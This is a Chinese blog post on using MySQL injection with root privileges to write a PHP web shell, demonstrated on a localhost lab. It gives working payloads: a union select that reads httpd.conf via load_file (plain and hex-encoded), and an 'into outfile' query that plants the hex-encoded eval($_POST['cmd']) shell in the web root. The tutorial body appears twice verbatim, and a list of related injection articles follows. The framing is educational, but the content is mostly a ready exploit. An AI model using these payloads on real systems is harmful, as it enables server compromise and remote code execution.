Mysql注入root权限直接写一句话马
2015-04-16 16:48
691 查看
首先我们的找到一个有注入的站:这里我用自己搭建的环境表示;大家不要乱来
http://localhost/pentest/sql/sql_injection_get.php?id=1
发现是root权限,我们尝试直接写马
首先要找到网站的主目录:
数据库目录:D:\wamp\bin\mysql\mysql5.5.20\data\
进行判断,服务器可能为wampserver简易版,httpd.conf文件在D:/wamp/bin/apache/Apache2.2.21/conf/httpd.conf
http://localhost/pentest/sql/sql_injection_get.php?id=1' and 1=2 union select 1,2,3 load_file('D:/wamp/bin/apache/Apache2.2.21/conf/httpd.conf') from user--+
如果这样不成功,建议将目录转换为hex编码进行:即 load_file(0x443A5C77616D705C62696E5C6170616368655C417061636865322E322E32315C636F6E665C68747470642E636F6E66)
找到了网站目录:D:/wamp/www
我们尝试写:
http://localhost/pentest/sql/sql_injection_get.php?id=1' and 1=2 union select 1,2,0x3C3F706870206576616C28245F504F53545B27636D64275D293B3F3E into outfile 'D:/wamp/www/xx.php' from user --+
<?php eval($_POST['cmd']);?>的hex编码:0x3C3F706870206576616C28245F504F53545B27636D64275D293B3F3E
然后访问:http://localhost/xx.php
http://localhost/pentest/sql/sql_injection_get.php?id=1
发现是root权限,我们尝试直接写马
首先要找到网站的主目录:
数据库目录:D:\wamp\bin\mysql\mysql5.5.20\data\
进行判断,服务器可能为wampserver简易版,httpd.conf文件在D:/wamp/bin/apache/Apache2.2.21/conf/httpd.conf
http://localhost/pentest/sql/sql_injection_get.php?id=1' and 1=2 union select 1,2,3 load_file('D:/wamp/bin/apache/Apache2.2.21/conf/httpd.conf') from user--+
如果这样不成功,建议将目录转换为hex编码进行:即 load_file(0x443A5C77616D705C62696E5C6170616368655C417061636865322E322E32315C636F6E665C68747470642E636F6E66)
找到了网站目录:D:/wamp/www
我们尝试写:
http://localhost/pentest/sql/sql_injection_get.php?id=1' and 1=2 union select 1,2,0x3C3F706870206576616C28245F504F53545B27636D64275D293B3F3E into outfile 'D:/wamp/www/xx.php' from user --+
<?php eval($_POST['cmd']);?>的hex编码:0x3C3F706870206576616C28245F504F53545B27636D64275D293B3F3E
然后访问:http://localhost/xx.php
相关文章推荐
- MySQL手工注入步骤+直接写入一句话
- 【sql注入教程】mysql注入直接getshell
- HPH+Mysql注入点利用 读取文件内容和导出一句话木马
- 由Jsp+Mysql注入到root权限的全程展 【好久没有安全类文章了,转一篇看看】
- sqlmap进行mysql注入root权限读写文件
- dver实例sqlmap进行mysql注入root权限读写文件
- Mysql注入初体验 Root权限下注入及普通用户利用系统表的注入
- 由Jsp+Mysql注入到root权限的全程展
- 【sql注入教程】mysql注入直接getshell
- MYSQL手工注入语句
- MYSQL注入中load_file()函数的进一步应用
- 遭遇一次MySQL猜解注入攻击
- springboot+jpa+mysql实现增加数据报错,无法创建controller,无法注入jpa接口
- MYSQL手工注入某日本网站
- mysql 直接从date 文件夹备份表,还原数据库之后提示 table doesn`t exist的原因和解决方法
- 教你如何建立mysql远程连接root权限用户
- mysql 将时间戳直接转换成日期时间
- MySql直接备份数据库文件的方法(MyISAM和InnoDB有所不同)
- SQL注入之DVWA平台测试mysql注入
- 一句话实现Mysql查询结果带行号